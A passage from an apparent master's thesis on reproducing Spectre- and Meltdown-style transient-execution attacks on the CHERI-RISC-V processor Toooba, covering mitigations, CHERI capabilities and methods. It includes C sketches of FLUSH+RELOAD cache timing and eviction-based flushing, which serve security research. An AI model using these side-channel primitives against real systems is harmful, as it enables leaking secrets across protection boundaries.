Meltdown-US demonstrated that supervisor memory can be read out without a sufficient privilege level. Kiriansky and Waldspurger [34] introduced a new attack initially called Spectre v1.2. This attack seeks to write to pages that are marked as read-only. The functioning of this attack is similar to Meltdown-US. The attacker writes to the read-only page, and other transient instructions

follow until the exception is thrown by the processor. The difference is that the transient executions are in another process. The speculative write of one process will trick another process into leaking secret information. Following Canella et al. [19], this attack uses a transient-execution sequence after a faulting instruction. Therefore, it is referred to as Meltdown-RW (Read/Write).

2.2.3 Timing Side Channels

Measuring how long a certain instruction sequence takes to execute is a well-known and often used side channel. The attacker measures the execution time and compares it to a reference time. Based on that, the attacker decides which information has been gained. Any sequence of instructions can be used for timing measurements in theory, but in practice only instruction sequences whose execution times deviate significantly between different runs are used. Often the access time of load operations is used. A load will commit earlier in time if it hits a cache and therefore decreases the overall execution time. In the other case, the load will have to go to DRAM and the execution time will be longer. Most transient-execution attacks demonstrated up to now use the FLUSH+RELOAD [18] attack. Here, the attacker flushes the Last Level Cache (LLC), which is shared between all cores. Next, the victim will run and load at least one cache line based on the secrets it computes on. After the victim has executed, the attacker reloads an entire buffer. If certain loads are faster than others, the attacker knows that the victim has accessed the corresponding cache line of the load. This allows the attacker to leak the secret value the victim computed on.
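
The reload step of FLUSH+RELOAD can be sketched as below. The cycle counter is read with the RISC-V rdcycle instruction; the flush step is left out because, as noted in Section 2.3.2, RISC-V defines no cache-flush instruction, so lines have to be evicted by other means, and the hit/miss threshold is an assumption that must be calibrated per platform.

#include <stdint.h>

#define LINE      64
#define ENTRIES   256
#define THRESHOLD 80u        /* assumed hit/miss boundary in cycles; calibrate per core */

extern uint8_t usr_arr[ENTRIES * LINE];

static inline uint64_t rdcycle(void)
{
    uint64_t c;
    __asm__ volatile("rdcycle %0" : "=r"(c));   /* RISC-V cycle counter */
    return c;
}

/* Times the reload of every probe line and returns the index of the fastest
 * (cached) one, i.e. the value the victim transiently encoded; -1 if none. */
int reload_and_recover(void)
{
    int best = -1;
    uint64_t best_time = UINT64_MAX;

    for (int i = 0; i < ENTRIES; i++) {
        volatile uint8_t *p = &usr_arr[i * LINE];
        uint64_t start = rdcycle();
        (void)*p;                               /* the timed access */
        uint64_t delta = rdcycle() - start;
        if (delta < THRESHOLD && delta < best_time) {
            best_time = delta;
            best = i;
        }
    }
    return best;
}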

2.3 Security Mechanisms

In order to mitigate transient-execution attacks, academia and industry have come up with many security mechanisms. The first generation of security mechanisms was implemented on the software side, as such mitigations could be deployed easily and quickly. Next, many hardware mechanisms were proposed and implemented in the following generation of microarchitectures. In this section, I summarise the most important principles of hardware-based mitigation mechanisms. Another mitigation mechanism – SinglePCC – will be explained in Section 6.1.

2.3.1 Tagging Microarchitectural State

One class of mitigation mechanisms is to tag parts of the microarchitecture with special values. Tagging parts of the microarchitecture prevents sharing microarchitectural state between protection domains that are not supposed to share information with each other. For CHERI systems, the CHERI Compartment Identifier (CID) is a tagging mitigation mechanism that was originally presented by Watson et al. [21]. A CID is an integer that uniquely identifies a compartment and is held in hardware. The idea is to add a field to each BTB entry that is big enough to hold the CID. When a prediction is made in the processor, the CID of the compartment currently running on the core is compared to the respective entry of the BTB. If they match, the prediction will be deemed trustworthy and the core will speculatively jump to the target. Otherwise, the core will throw away the prediction result and will wait until the jump target has been successfully resolved. Similar changes have to be made for predictions coming from the RSB.

The CID mechanism successfully stops attacks that aim to cross protection domains. A good example of an attack being mitigated is the attack on sandboxes as described in Section 5.1.3. Tagging microarchitectural state has also been adopted by industry, e.g., by Arm with the introduction of Armv8.5-A. The approach applied by Arm is to tag its microarchitecture and also provide special registers that either allow or disallow using branch prediction results from one context in another context. This has been implemented in multiple processors, for example, the Cortex-A77 [36].
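
A small software model can make the CID check concrete. The sketch below is not Toooba's implementation – the entry layout, the table size, and the indexing are assumptions – and only the comparison against the currently running compartment follows the description above.

#include <stdbool.h>
#include <stdint.h>

#define BTB_ENTRIES 512                  /* assumed table size */

struct btb_entry {
    uint64_t tag;                        /* identifies the branch instruction    */
    uint64_t target;                     /* predicted jump target                */
    uint64_t cid;                        /* compartment that installed the entry */
    bool     valid;
};

static struct btb_entry btb[BTB_ENTRIES];

/* Returns a prediction only if the entry was installed by the compartment
 * that is currently running; otherwise the front end must wait until the
 * real jump target has been resolved.                                     */
bool btb_lookup(uint64_t pc, uint64_t current_cid, uint64_t *target)
{
    struct btb_entry *e = &btb[(pc >> 2) % BTB_ENTRIES];
    if (e->valid && e->tag == pc && e->cid == current_cid) {
        *target = e->target;
        return true;
    }
    return false;                        /* prediction discarded across compartments */
}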

2.3.2 Special Instructions

Another option to mitigate transient-execution attacks is to give users control over how much they want to share with other compartments. This can be done by changing the ISA and adding new instructions. This puts the user or the operating system in charge of what can be microarchitecturally visible to other compartments operating on the same system. The following paragraphs discuss several instructions that could be added and what influence they have.

One option is to flush the caches or part of them. Whenever a context switch is conducted, the operating system can flush all caches. This will effectively mitigate all attacks presented in Chapters 4 and 5, as the secret cannot be recovered by timing measurements. Neither RISC-V nor CHERI-RISC-V offers a flush instruction yet [11, 12, 37]. However, this does not solve the problem of transient-execution attacks themselves, as the transient-execution sequence still happens – its effects are simply cleaned up.

However, attackers may be able to find another side channel and use it to recover the secret. Moreover, the performance penalty of regularly clearing the caches is cost prohibitive in a real system.

Furthermore, it might be an option to add instructions that enable flushing of microarchitectural state, e.g., flushing the branch prediction unit. This effectively mitigates cross-protection-domain training and entry injection. However, it does not prevent attacks that work by finding a gadget in the victim domain and having this gadget reveal a secret. Another option is to disable entire microarchitectural units. This implies performance penalties, but effectively mitigates attacks through a specific microarchitectural unit; e.g., Arm offers to completely disable memory disambiguation, thereby preventing Spectre-STL attacks [36]. Another class of instructions that is often used in microarchitectures is barriers [33, 36]. Barriers – also called fences – do not allow instructions executed out-of-order or speculatively to pass them and therefore enable software to make critical parts of its code secure. For example, Arm introduces a barrier that works by not letting speculative loads pass previous stores to the same virtual address [36].
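
To illustrate how such barriers are used from software, the gadget of Figure 2.2 can be hardened by placing a barrier between the bounds check and the dependent loads. The speculation_barrier() macro below is a placeholder only – RISC-V defines no standard speculation barrier, so on a concrete core it would have to be mapped to whatever fence that implementation provides.

#include <stddef.h>
#include <stdint.h>

extern uint8_t sec_arr[];
extern size_t  array_size;
extern uint8_t usr_arr[];

/* Placeholder: a compiler barrier only, NOT a real speculation barrier.
 * A hardened build would substitute the implementation-specific fence.  */
#define speculation_barrier()  __asm__ volatile("" ::: "memory")

int hardened_victim(size_t i)
{
    int r = 0;
    if (i < array_size) {
        speculation_barrier();   /* the loads below must not run under a mispredicted branch */
        int j = sec_arr[i];
        r = usr_arr[j];
    }
    return r;
}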

2.4 CHERI

Capability Hardware Enhanced RISC Instructions (CHERI) is a joint research project of the University of Cambridge and SRI International. The CHERI project has also been joined by Arm Limited, who are developing a CHERI-extended System-on-Chip called Morello using the ARMv8-A architecture as the base ISA. The goal of the CHERI project is to enrich ISAs with additional instructions that enable systems to have fine-grained memory protection and compartmentalisation. CHERI can be divided into four parts: the abstract model, the mapping of CHERI to a conventional ISA, the hardware implementation, and the software implementation. This section describes the key points of the four parts of the CHERI project for RISC-V. CHERI is explained more thoroughly in [37], which will be the main source unless stated otherwise.

2.4.1 CHERI Abstract Model

The CHERI model itself is abstract – architecture neutral – and can in theory be mapped to any concrete architecture. Therefore, CHERI extends an architecture – referred to as the baseline architecture – rather than introducing a new architecture. The CHERI model is designed so that it composes

well with mechanisms already present in contemporary systems. This includes Memory Management Units (MMUs), virtual memory in general, processor ring models, and the exception hierarchy of the baseline ISA. The main concept of CHERI is capabilities. Capabilities are tokens owned by a program that are characterised by being unforgeable and delegatable. A capability authorises a program to access a certain area of memory. CHERI follows two main design principles. First, the designers want to enforce the principle of least privilege. This principle, commonly used in the security world, says that a program should only get the access and rights it needs for correct operation and not more. The second principle is the principle of intentional use, which expresses that when a choice to select a certain right from a pool of rights exists, this choice always has to be made explicitly rather than implicitly. The three main project goals of CHERI are to provide fine-grained memory protection, software compartmentalisation, and a viable transition path. A viable transition path means that the transition from the conventional architecture to the CHERI variant of it should be possible with a manageable effort. While the first two CHERI goals are security goals, the latter is a design goal, as the designers assume that CHERI will not be used in practice without being compatible with existing systems.

CHERI uses this concept of capabilities and defines its own CHERI Capabilities in order to fulfil its project goals. The key feature of CHERI is that capabilities are not implemented in software, but in hardware. Capabilities and instructions to modify them become part of the ISA. This includes a register file for CHERI capabilities, as they need more space than conventional integer pointers. The CHERI model does not specify how these registers need to be implemented. The implementation can differ from instantiation to instantiation. The following text gives an incomplete list of registers defined by CHERI:

General Purpose Capability Registers Their usage is comparable to general purpose registers on conventional architectures. Code can freely use general purpose capability registers for loading, storing, and manipulating capabilities, but these registers can also hold non-capability data. The architectural instantiation can decide how many general purpose capability registers are implemented. The concrete implementation also determines whether the general purpose capability registers are an extension of the general purpose register file defined by the baseline ISA – a merged capability register file – or whether the two register files are split.

Figure 2.5: Compressed CHERI Capabilities in memory. Adapted from Watson et al. [37]. The 128-bit in-memory format packs the 16-bit permissions field (p), the 18-bit object type (otype), and 27 bits of compressed bounds into one 64-bit word, and holds the 64-bit pointer address (a) in the other word.

Program Counter Capability (PCC) This register extends the program counter of conventional architectures so that the register holds a capability instead of an integer pointer. Every instruction fetch is issued through the PCC.

Default Data Capability (DDC) This register is used if code is not CHERI-aware. All data loads and stores of such code are issued through the DDC. CHERI-aware code does not use the DDC, but the more fine-grained capabilities granted to the running code.

Others Depending on the baseline ISA more capability registers are available, e.g., a register for storing the PCC during exception handling.

CHERI Capabilities aim to provide hardware-aided security for pointers. The following attributes are enforced on CHERI Capabilities and must hold at any time.

Bounds The memory accessible by CHERI Capabilities is limited by bounds. An access outside of the bounds is strictly forbidden.

Permissions The kinds of operations that are permitted on the accessible memory are limited by permissions. Like bounds, permissions are part of CHERI Capabilities.

Monotonicity An operation can never add more privileges to a CHERI Ca- pability, but only restrict these privileges.

Integrity and Provenance A CHERI Capability is always derived from another valid CHERI Capability and it is ensured at any point of execution that a corrupted CHERI Capability cannot be used as a reference.

Figure 2.5 shows the format of 128-bit CHERI Capabilities in memory. This is the format used throughout this entire thesis work. CHERI Capabilities

contain the pointer address itself, the compressed bounds, the object type, and the permissions. The bounds are compressed using the CHERI Concentrate encoding [37, 38]. CHERI defines one-bit tags for capabilities that are held both in capability registers and in memory. These tags protect the integrity of capabilities and ensure that capabilities are always derived from a valid capability. The tag bit is not shown in Figure 2.5. The exact bits of 128-bit capabilities are discussed more thoroughly where appropriate for certain attacks in the following chapters.

CHERI Capabilities – from now on referred to as capabilities – spread like a tree during runtime. At CPU start, capability registers hold root capabilities that have all permissions set and can access the entire available memory space. Code will monotonically refine root capabilities during runtime as desired. Finally, a user-space program will be granted fine-grained capabilities aligned to its needs. These capabilities are the leaves of the tree unless the program decides to refine its capabilities again. The process of deriving capabilities defines a chain of provenance.

Furthermore, CHERI allows sealing and unsealing of capabilities. A sealed capability is non-dereferenceable and immutable, which means that sealed capabilities cannot be manipulated and cannot be used for memory accesses. Unsealing is only possible with a capability that grants sufficient rights to do so. Sealed capabilities are used for two purposes in CHERI systems, even though more use cases are possible. First, they can be passed to untrusted code, e.g., to serve as a token of authority. Second, sealed capabilities can be used for protection domain switching. In an object-oriented environment, a sealed code capability and a sealed data capability constitute the object's code and its accessible data. An atomic operation unsealing both capabilities and jumping to the code capability represents a protection domain switch.

In order to comply with the principle of intentional use, CHERI extends the baseline ISA with capability instructions. It is always explicit which operands an instruction has, and it cannot be interpreted dynamically, e.g., a load either loads an integer pointer or a capability. CHERI provides the following classes of instructions:

Extract Capability Fields The purpose of these instructions is to copy certain fields of capabilities, e.g. the offset field, to a general purpose register for inspection reasons.

Move Capability The purpose of these instructions is to move a capability from one capability register to another one without modifying the capability itself.

Manipulate Capability These instructions allow monotonically changing fields of capabilities, e.g. the offset field (a C-level sketch of such a derivation follows after this list).

Load and Store These instructions allow loading or storing data through a capability, but this class also contains instructions that allow loading or storing capabilities through another capability. The capability used for loading or storing has to allow that access by being suitably configured.

Change Control-Flow CHERI offers jump and branch instructions. Whether branches are taken or not depends on whether certain capability fields are set.

(Un)seal Capability These instructions allow sealing or unsealing a capability with another authorising capability. This class of instructions also contains protection domain switching.

Check Capability These instructions check whether capability fields match expected values and throw an exception if this is not the case.
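
To make the manipulate and check classes concrete at the C level, the sketch below derives a narrower capability from a wider one using CHERI-LLVM capability builtins. It assumes pure-capability compilation, in which every pointer is a capability; the builtin name should be checked against the CHERI-LLVM headers, and the function names are illustrative.

#include <stddef.h>

/* Given a capability to a whole buffer, derive a capability that only
 * authorises access to one record inside it. Monotonicity guarantees the
 * derived capability can never regain the wider bounds.                  */
char *derive_record_cap(char *buf_cap, size_t offset, size_t record_len)
{
    char *rec = buf_cap + offset;                       /* pointer arithmetic preserves provenance */
    rec = __builtin_cheri_bounds_set(rec, record_len);  /* restrict bounds (manipulate class)      */
    return rec;
}

/* Any access through the derived capability outside its bounds traps; the
 * hardware bounds check corresponds to the check-capability behaviour.    */
void use_record(char *rec, size_t record_len)
{
    rec[0] = 1;                  /* in bounds: allowed                           */
    /* rec[record_len] = 1; */   /* out of bounds: would raise a CHERI exception */
}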

2.4.2 CHERI-RISC-V

CHERI-RISC-V [37] is the mapping of the abstract CHERI model to RISC-V. As explained above, RISC-V is an ISA design space due to its modular design. CHERI-RISC-V can therefore also be considered an ISA design space. A particular instantiation of CHERI-RISC-V may choose to implement multiple options described in the following paragraphs in a way that is parameterisable.

Both 32-bit and 64-bit RISC-V are extended for CHERI. The CHERI designers also express the possibility of a 128-bit CHERI-RISC-V mapping when RISC-V has evolved that far. The length of capabilities is 64 bits for 32-bit CHERI-RISC-V and 128 bits for 64-bit CHERI-RISC-V, not including the tag bit. CHERI-RISC-V describes both split and merged register files. The goal of the CHERI project is to provide hardware that offers memory protection and compartmentalisation for all kinds of application areas. In a merged register file, a general purpose register has the width to hold a capability as well. A merged register file helps to reduce the number of logic gates on a chip where this is necessary, e.g., ISAs for embedded processors like RV32E. However, the principle of intentional use has to be fulfilled. An access to a register must never be ambiguous in the way its value is interpreted.

Besides the load and store instructions for bytes, half-words, words, and double-words, CHERI-RISC-V also extends RISC-V with instructions that can

load and store floating point values through capabilities. Furthermore, CHERI-RISC-V allows atomic operations to work with capabilities. Therefore, all memory accesses in a CHERI-RISC-V system can be handled through capabilities if this is desired by the program. CHERI-RISC-V also offers compressed CHERI instructions. When executed in capability pointer mode, each implicit register operand of a compressed instruction is expected to be the capability variant of the corresponding register. Furthermore, CHERI-RISC-V introduces Special Capability Registers (SCRs) that extend conventional RISC-V registers, but also add new registers. The purpose of SCRs is to enable exception handling with capabilities. They extend {m,s,u}{tvec,epc,scratch} and add new data capabilities for each of the three privilege levels for their respective memory areas. CHERI-RISC-V also extends RISC-V CSRs for capability functioning. Last, CHERI-RISC-V enriches RISC-V's Page Table Entries (PTEs) such that there is one bit that specifies whether capabilities may be stored to that page and one bit that specifies whether a capability may be loaded from that page.

2.4.3 CHERI-RISC-V Hardware

The CHERI project contains three RISC-V processors that have been extended with CHERI instructions: Piccolo^1 is an in-order, 3-stage pipeline processor that implements RV32ACIMUxCHERI, where xCHERI means that this processor implements CHERI-RISC-V as well. Flute^2 is an in-order, 5-stage pipeline processor that implements RV64ACDFIMSUxCHERI and supports virtual memory as well. Toooba^3 is an out-of-order, deep, and superscalar processor that implements RV64ACDFIMSUxCHERI and supports virtual memory.

2.4.4 CHERI Software Stack

There is a large software stack of programs that have been created especially for CHERI systems or adapted for them. In this section, I describe the important bits with respect to the work conducted in this thesis.

^1 Available at https://github.com/CTSRD-CHERI/Piccolo
^2 Available at https://github.com/CTSRD-CHERI/Flute
^3 Available at https://github.com/CTSRD-CHERI/Toooba

CHERI-LLVM

The LLVM framework can be split into two parts: the front-ends and back-ends. The main task of the front-ends is to parse the input files and generate the output that is used by the back-ends – the Intermediate Representation (IR). LLVM supports multiple front-ends, e.g., clang in order to compile C/C++. Furthermore, each target ISA has its own back-end that generates machine code specific to that ISA. The CHERI project extended the clang front-end generically for all supported ISAs such that pointers are represented by capabilities instead of integer values. However, each back-end has to be tailored for the particular underlying ISA, e.g. MIPS or RISC-V, in order to produce the correct CHERI instructions needed. These changes constitute the CHERI-LLVM framework^4. The CHERI-LLVM compiler framework also includes other tools not needed for compiling in the first place, but that are helpful for debugging, e.g., riscv64cheri-objdump.

Operating Systems

The CHERI software stack includes two operating systems that have been adapted to run on a CHERI processor. CheriBSD5 is a fork of FreeBSD and receives the main research focus in OS research within the CHERI project. CheriBSD provides CheriABI [39], which is an Application Binary Interface such that applications that use CHERI can communicate with the kernel. The kernel itself does not need to use capabilities internally, but can. The pure-capability CheriBSD kernel is currently a work in progress. CheriRTOS6 is a fork of FreeRTOS and intended as a pure-capability system from the very beginning [40].

2.4.5 CHERI Security Model

CHERI aims to implement two security principles: fine-grained memory protection and software compartmentalisation. These two principles need to be guaranteed in all implementations – including in speculation and out-of-order execution. Cache timing side channels as described in Section 2.2.3 are not part of the security model. AMD states that its architectures do not prevent cache timing side-channel attacks either and argues that these attacks have to be prevented by software [41]. Arm states that timing side-channel

4available at https://github.com/CTSRD-CHERI/llvm-project
5available at https://github.com/CTSRD-CHERI/cheribsd
6available at https://github.com/CTSRD-CHERI/cherios

attacks are no novelty in themselves; however, timing side-channel attacks in connection with transient execution were previously not known [32]. CHERI does not guarantee the absence of timing side channels, but should give guarantees about transient execution. This means that transiently executed instructions should not lead to any privilege escalation. An attacker should never have access to more capabilities than those granted by the architectural register state and the capabilities reachable through those. Furthermore, CHERI-RISC-V systems should follow the security model required by RISC-V, which includes separating the M, S, and U privilege modes and their access rights. Attacks can be divided into three classes based on the degree of involvement of the victim:

Independent This class of attacks does not require any action or help from the “victim”.

Exploitative This class of attacks requires the “victim” to unknowingly or unwillingly cooperate with the attacker.

Collusion This class of attacks requires the “victim” to willingly collaborate with the attacker.

It is expected that attackers are able to execute arbitrary code on a CHERI system, e.g., a user limited to a sandbox who has turned into an attacker. An example of this could be JavaScript code pulled from the web when rendering a web page. Therefore, an attacker is assumed to be able to attempt independent attacks. Meltdown-style attacks – as explained in Section 2.2.2 – are typical independent attacks. It is further expected that the entire CHERI system should be safe in the presence of such an attacker, even in the case of instructions only being executed transiently. Furthermore, a CHERI system has to expect that an attacker will attempt exploitative attacks by trying to get the unwitting help of other code running on the system and having access to powerful capabilities. Spectre-style attacks – as explained in Section 2.2.1 – are typical exploitative attacks. For CHERI implementations, any willing collaboration from the victim side is not expected, which excludes the class of collusion attacks from the security model used in this thesis work.

2.5 Related Work

Woodruff et al. [21] discussed the applicability of Spectre-PHT, Spectre-BTB, and Meltdown-US to CHERI systems. They clearly state that capability fields must not be subject to speculation, but all CHERI checks have to be finished

successfully before accessing memory. Otherwise the protection mechanisms of CHERI are likely to be bypassed. They are especially concerned about cross-protection-domain attacks on CHERI systems. Therefore, they propose the introduction of a CID that specifies when microarchitectural state may be shared with other protection domains. Gonzalez et al. [42] were the first to demonstrate speculative execution attacks on a RISC-V processor. They successfully reproduced Spectre-PHT and Spectre-BTB on the Berkeley Out-of-Order Machine (BOOM) [43], but no other speculative attacks. Furthermore, they did not attempt to conduct Meltdown-style transient-execution attacks. However, Gonzalez et al. stated the theoretical feasibility of the remaining transient-execution attacks, which is demonstrated in my work. Similar work on the BOOM processor has been done by Le et al. [44]. There has been more work conducted on other comparable RISC architectures. Arm has summarised and explained the most impactful transient-execution attacks and explained how they would be conducted on an Arm microarchitecture [32]. Furthermore, Arm has evaluated which of its microarchitectures are vulnerable to which attack [45]. The covered attacks are Spectre-PHT, Spectre-BTB, Spectre-RSB, Spectre-STL, Meltdown-US, and Meltdown-GP – the attack names used by Arm do not follow the naming scheme of this work though. Arm clearly states that all of its other, unlisted microarchitectures are not vulnerable to any transient-execution attack. None of the listed microarchitectures is vulnerable to all attacks, but only to a subset. However, Spectre-PHT was classified as successful on all listed microarchitectures. Moreover, each attack could be reproduced on at least one of Arm's microarchitectures. As stated by Canella et al. [19], Arm's processors are only vulnerable to a subset of the Meltdown-style attacks that Intel's and AMD's processors are vulnerable to. Many Meltdown-style attacks are tailored to the x86_64 architecture and special features of various implementations of it. Neither Arm's ISA nor RISC-V has the necessary features and therefore no implementation of these ISAs is vulnerable to this subset of Meltdown-style attacks. Due to the similarity in architectural style, Arm's summary of attacks also sets the scope of this work. The four Spectre attacks, Meltdown-US, and Meltdown-GP will be the main targets of this work.

Chapter 3

Methods

In this chapter, I describe the resources I used to conduct my experiments. Furthermore, I explain which research methods I applied to which part of this work. The last part of this chapter describes the common mechanisms I used and how the actual measurements were conducted.

3.1 Toooba

The experiments presented in Chapters 4 and 5 are conducted on CHERI's fork of the out-of-order processor Toooba. Toooba itself has been developed by Bluespec Inc., which added support for compressed instructions and for debugging to MIT's RISCY-OOO [46] – a framework that allows a parameterisable configuration of the processor to be built. RISCY-OOO is written in the Bluespec SystemVerilog Hardware Description Language (HDL), which allows configuration to be done more easily. Bluespec HDL code can be simulated directly or can be compiled to Verilog code, which can then be simulated by a Verilog simulator or be used to produce an FPGA image. For all my experiments, I compiled Toooba's code to Verilog code using the open-source Bluespec compiler1 (release 2020.02). I used the verilator simulator2 (version 3.916) in order to produce the results presented in Chapters 4 and 5. Figure 3.1 shows the parameterisable RISCY-OOO pipeline that is used in Toooba. The pipeline can be divided into three separate parts: Fetch, Execute, and Commit. In this figure, the Fetch stage includes decoding and renaming as well, which is not the case in conventional models of the pipeline, e.g. by Patterson and Hennessy [14]. This part is also called the front-end of Toooba, and instructions are handled in-order in this part.

1available at https://github.com/B-Lang-org/bsc
2available at https://github.com/verilator/verilator


(Pipeline diagram: Fetch 1–3, Decode, and Rename feed instruction queues (IQ) for the ALU, FPU, and MEM pipelines; Reorder Buffer, register file/forwarding, and Commit complete the pipeline; BTB, TLB, I$, and D$ are attached. Diagram not reproduced.)

Figure 3.1: The parameterisable RISCY-OOO pipeline.3 In my configuration, I chose n=2, which means that Toooba has two ALU pipelines, one FPU pipeline, and one memory pipeline.

The rename stage puts instructions into the reservation stations of the respective pipelines, of which Toooba has three: the Arithmetic Logic Unit (ALU) pipeline, the Floating Point Unit (FPU) pipeline, and the memory pipeline. The ALU pipeline can handle n instructions per cycle, the FPU pipeline n/2 instructions per cycle, and the memory pipeline one instruction per cycle. The Execute part of Toooba, including all three pipelines, is completely out-of-order and can execute instructions as soon as all operands are available to it. In my configuration of Toooba, I chose n = 2, which means that Toooba can fetch, decode, rename, issue, and retire 2 instructions in one cycle if no bubbles appear in the pipeline; e.g., a misprediction may cause Toooba not to be able to commit any instruction for multiple cycles. Toooba has two ALU pipelines, one FPU pipeline, and one memory pipeline in my configuration. Processors that can execute more than one instruction per clock cycle are called superscalar processors. In my instantiation, Toooba is a 2-superscalar processor because it can execute two instructions per cycle. Furthermore, I used the TEST cache configuration, which determines the following settings: the L1 data and instruction cache are each 2 KiB large and 2-way associative, the L2 cache has a size of 8 KiB and is 2-way associative as well, and cache lines are 64 bytes long.

3This figure is borrowed from the CHERI team.

Out-of-order window size    64
L1 size                     2 KiB
L2 size                     8 KiB
L1/L2 ways                  2
Cache line size             64 byte
Load Queue size             24
Store Queue size            14
Store Buffer size           4

Table 3.1: The parameters of the Toooba configuration used for my experi- ments.

Toooba has a window of 64 instructions that can be executed out-of-order, and the memory queues (load queue, store queue, store buffer) are capable of tracking 38 outstanding memory instructions. Toooba supports Sv39, which means that virtual addresses are 39 bits long. These data are summarised in Table 3.1. In order to successfully conduct Spectre-BTB attacks as presented in Chapters 4 and 5, I needed to make changes to Toooba's BTB. Before my changes, Toooba did not use a hashing function for the tag, but used the entire address. I implemented a hashing function, which is described in Section 5.1.3 as it poses a contribution to the research platform. Having a hashing function for tags in the BTB is a common mechanism used in industry [22]. Therefore, I find that my changes to Toooba's BTB are not a simplification of my work, but rather an adaptation to a real-world setup.

3.2 Research Methodology

In this master's thesis work, I used quantitative research methods in order to prove the hypothesis that transient-execution attacks are feasible on Toooba. Transient-execution attacks will be reproduced in assembly and C code. I rely on the compilation toolchain – compiler, linker, and assembler – being correct in order to produce meaningful results. The success of attacks will be determined by whether the access time to certain memory data is significantly shorter than to other data. For all attempted attacks, I used the verilator simulator, which generates a cycle-accurate model of Toooba's Verilog code. In order for my results to be meaningful, I rely on the verilator simulation to

be correct. Furthermore, the explanation of why an attack works on Toooba or not is conducted with quantitative methods, as simulation gives clear and objective evidence of which actions Toooba takes in a given scenario. In the discussion of the different transient-execution attacks, I mainly use quantitative research methods as well. Some Spectre-style attacks are run with a mitigation mechanism enabled, giving quantitative results on whether a specific attack is successful or not. However, I will also use qualitative methods in order to describe what impact certain attack classes have. The impact of an attack is determined by the threat model. Threat models, and evaluating threats against them, require judgement and cannot be expressed purely in objective, quantitative data.

3.3 Common Mechanisms

This section summarises common techniques used for the experiments conducted in Chapters 4 and 5 or used to prepare them.

3.3.1 Flushing Caches

Flushing caches is used by transient-execution attacks for two reasons. First, flushing caches – or evicting a specific cache line – leads to longer miss penalties for loads and more accurate timing analysis. Second, flushing caches provides a clean state before conducting timing measurements. As explained in Chapters 4 and 5, attackers want the processor to misspeculate and want the time span until the misprediction is discovered and instructions are rolled back to be as long as possible. This can be achieved by making load requests go all the way to memory and not hit any of the caches. As described in Section 3.3.2, probing the caches needs a clean state in order to achieve reliable results. As stated in Table 3.1, Toooba's L1 data cache in the TEST configuration has space for 2 KiB and the L2 cache has space for 8 KiB. RISC-V does not have a dedicated flush instruction and CHERI-RISC-V does not provide one either [11, 12, 37]. This means that attackers need to implement their own flush functions. I implemented a function that loads an entire memory region into the caches and thereby evicts content previously present. This function loads at a granularity of 64 bytes, since for each load the entire respective cache line will be loaded.
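A minimal C sketch of such an eviction-based flush is shown below; the function name, buffer, and size are my own illustration, not the exact code used in this work.

    #include <stddef.h>
    #include <stdint.h>

    #define CACHE_LINE 64

    /* Touch one byte per cache line of a buffer larger than the 8 KiB L2
     * cache of the TEST configuration, evicting previously cached data. */
    static void evict_caches(volatile uint8_t *evict_buf, size_t evict_len)
    {
        volatile uint8_t sink = 0;
        for (size_t off = 0; off < evict_len; off += CACHE_LINE)
            sink ^= evict_buf[off];
        (void)sink;
    }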

3.3.2 Timing Measurements

For the attacks presented in Chapters 4 and 5, I always use the same mechanism in order to prove that an attack has been conducted successfully. The code under attack will speculatively load a value into the core. This value is used as an index into an array shared between victim and attacker. Probing the access times to values in this shared array will allow the attacker to recover the original secret. Throughout all my experiments, I use FLUSH+RELOAD [18], which is an access-driven technique. In order to successfully probe the cache, the attacker evicts all cache lines of the array to probe – the flush phase – and then starts the attack. This leads to the situation that the only cache line of the shared array being present is the one that was speculatively accessed to reveal the secret. As a next step, the attacker accesses value after value in the shared array and measures the time it takes to access the array as precisely as possible – the reload phase. The attacker probes at the granularity of cache lines, which means at the granularity of 64 bytes in Toooba. The results of probing the memory addresses [0x80001000, 0x800017ff] are depicted in Figure 3.2. As stated in Table 3.1, Toooba's L1 data cache has 32 lines, which are indexed by [0, ..., 31]. This number of cache lines exactly matches the 0x800 bytes which the attacker wants to probe in steps of 64 bytes. In the example in Figure 3.2, the victim code has speculatively accessed a double-word at the address 0x80001100. This is reflected exactly in the data, as the cache line with index four has a significantly shorter access time than all other cache lines. All other memory accesses but the very first one require roughly 30 cycles with only small variations. However, the first memory access is significantly slower, needing 60 cycles. This can be explained by the cold branch predictor in the assembly code of the probe function. The cold branch predictor causes Toooba to fetch instructions from a cache line that is not yet present, which leads to this delay. The attacker can only measure the presence of a certain cache line, but not which exact address caused the cache line to be loaded. This means that the attacker can only leak a very limited number of bits per probing attack. In my work, I do not use cache bank collision attacks as described in [47]. Therefore, the only information the attacker can gain is which cache line has been accessed compared to all possible cache lines.

log2(#cache lines) = log2(32) = 5 bits (3.1)

Equation 3.1 shows the amount of information an attacker gains in general and the exact number in my configuration of Toooba.
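A minimal C sketch of the reload phase is given below; the names and the rdcycle-based timing are my own illustration and assume that the cycle CSR is readable from the attacker's privilege mode.

    #include <stdint.h>

    static inline uint64_t rdcycle(void)
    {
        uint64_t c;
        asm volatile("rdcycle %0" : "=r"(c));
        return c;
    }

    /* Measure the access latency of each of the 32 probed cache lines
     * (32 lines x 64 bytes = 0x800 bytes).  A noticeably shorter latency
     * for line i indicates that the victim touched probe_buf[i * 64]. */
    static void reload(volatile uint8_t *probe_buf, uint64_t latency[32])
    {
        for (int i = 0; i < 32; i++) {
            uint64_t start = rdcycle();
            (void)probe_buf[i * 64];
            latency[i] = rdcycle() - start;
        }
    }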

(Plot: Cycles Needed, roughly 0–60, against Cache Line Number 0–28; diagram not reproduced, see caption below.)

Figure 3.2: Results of probing the L1 cache after an attack has been conducted.

In order to recover more than five bits, an attacker will need to conduct the attack multiple times; e.g., to recover a full 64-bit double-word, an attacker has to repeat the attack 13 times. The speed of leaking values determines the success of real-world attacks [22, 27]. However, this is out of scope for this thesis work. In Chapters 4 and 5, I present the attacks attempted and whether they have been conducted successfully, which implies that they are capable of leaking information, but no claims about the speed and implications of their impact on real-world attacks are made.

Chapter 4

RISC-V Results

In this chapter, I describe the results obtained by reproducing the different transient-execution attacks described in Chapter 2 on RISC-V Toooba. To my knowledge, this work is the first to reproduce all four Spectre-style attacks on a RISC-V processor. All attacks together build an extensible framework for exploring transient-execution attacks on RISC-V processors, which constitutes a platform for further research not only on Toooba, but on any other vulnerable processor. An extension to the framework is contributed by the work described in Chapter 5, which extends all Spectre-style RISC-V attacks to CHERI-RISC-V attacks and adds new Meltdown-style attacks. Describing the reasons for the success or failure of Spectre-style attacks in both this chapter and the chapter about the CHERI-RISC-V results would introduce many redundancies. Therefore, I decided to only give a high-level explanation for most attacks in this chapter and to dive deeply into Toooba's pipeline in the following chapter.

4.1 Spectre Attacks

